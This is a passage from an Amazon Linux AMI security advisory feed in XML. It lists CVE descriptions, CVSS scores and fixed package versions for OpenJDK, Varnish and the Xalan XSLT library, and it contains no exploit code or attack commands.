CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21296:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21294:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21293:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21283:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21282:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21248:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21248" title="" id="CVE-2022-21248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21282" title="" id="CVE-2022-21282" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21283" title="" id="CVE-2022-21283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21293" title="" id="CVE-2022-21293" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21294" title="" id="CVE-2022-21294" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21296" title="" id="CVE-2022-21296" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21299" title="" id="CVE-2022-21299" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21305" title="" id="CVE-2022-21305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21340" title="" id="CVE-2022-21340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21341" title="" id="CVE-2022-21341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21349" title="" id="CVE-2022-21349" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21360" title="" id="CVE-2022-21360" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21365" title="" id="CVE-2022-21365" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21426" title="" id="CVE-2022-21426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21434" title="" id="CVE-2022-21434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21443" title="" id="CVE-2022-21443" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21476" title="" id="CVE-2022-21476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21496" title="" id="CVE-2022-21496" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21540" title="" id="CVE-2022-21540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21541" title="" id="CVE-2022-21541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34169" title="" id="CVE-2022-34169" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.342.b07-0.68.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.342.b07-0.68.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" 
version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.342.b07-0.68.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.342.b07" release="0.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.342.b07-0.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1632</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1632: important priority package update for varnish</title><issued date="2022-08-15 18:37:00" /><updated date="2022-08-22 23:57:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23959:
A flaw was found in Varnish. This flaw allows an attacker to carry out a request smuggling attack on HTTP/1 connections on Varnish cache servers. This smuggled request goes through the usual Varnish Configuration Language (VCL) processing since the Varnish server treats it as an additional request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23959" title="" id="CVE-2022-23959" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="varnish-libs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-libs-devel" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-libs-devel-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-docs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-docs-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-debuginfo" version="4.0.5" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/varnish-debuginfo-4.0.5-3.23.amzn1.x86_64.rpm</filename></package><package name="varnish-libs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish-libs-devel" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-libs-devel-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish-docs" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-docs-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-4.0.5-3.23.amzn1.i686.rpm</filename></package><package name="varnish-debuginfo" version="4.0.5" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/varnish-debuginfo-4.0.5-3.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1633</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1633: important priority package update for java-1.7.0-openjdk</title><issued date="2022-09-01 17:24:00" /><updated date="2022-09-08 23:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-34169:
The Xalan Java XSLT library has an integer truncation issue when processing malicious stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.
CVE-2022-21541:
MethodHandle.invokeBasic() method can be accessed on byte code level from an arbitrary class.
CVE-2022-21540:
Generated code produced by C1 may leak a package-private class to a class from a different package.
CVE-2022-21496:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21476:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
CVE-2022-21443:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21434:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21426:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u331, 8u321, 11.0.14, 17.0.2, 18; Oracle GraalVM Enterprise Edition: 20.3.5, 21.3.1 and 22.0.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21365:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21360:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21349:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21341:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21340:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21305:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
CVE-2022-21299:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21296:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
CVE-2022-21294:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21293:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21283:
